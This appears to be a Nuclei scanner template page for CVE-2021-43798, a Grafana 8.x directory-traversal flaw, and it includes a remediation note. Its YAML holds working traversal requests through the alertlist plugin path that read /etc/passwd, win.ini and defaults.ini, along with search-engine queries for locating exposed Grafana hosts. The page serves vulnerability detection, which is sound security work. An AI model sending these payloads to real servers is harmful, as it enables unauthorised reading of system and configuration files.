Skip to content
Nuclei Templates

Grafana v8.x - Arbitrary File Read

ID: CVE-2021-43798

Severity: high

Author: z0ne,dhiyaneshDk,j4vaovo

Tags: cve2021,cve,packetstorm,grafana,lfi

Description

Section titled “Description”

Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is <grafana_host_url>/public/plugins/NAME/, where NAME is the plugin ID for any installed plugin.

YAML Source

Section titled “YAML Source”
id: CVE-2021-43798


info:
  name: Grafana v8.x - Arbitrary File Read
  author: z0ne,dhiyaneshDk,j4vaovo
  severity: high
  description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
  reference:
    - https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
    - https://nosec.org/home/detail/4914.html
    - https://github.com/jas502n/Grafana-VulnTips
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43798
    - http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43798
    cwe-id: CWE-22
    epss-score: 0.97474
    epss-percentile: 0.99963
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 3
    vendor: grafana
    product: grafana
    shodan-query:
      - title:"Grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
      - http.title:"grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve2021,cve,packetstorm,grafana,lfi


http:
  - method: GET
    path:
      - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd'
      - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini'
      - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini'


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/plain"


      - type: regex
        regex:
          - 'root:.*:0:([0-9]+):'
          - '\/tmp\/grafana\.sock'
          - '\[(fonts|extensions|Mail|files)\]'
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a0047304502210096387f76418cde3aa08201c1599d28a7ac136d120501db3bceaba2de097945e9022079f53286825666fd08c3a373bbab2c1861899f90a2f9c8c673150c4067f93275:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43798.yaml"

View on Github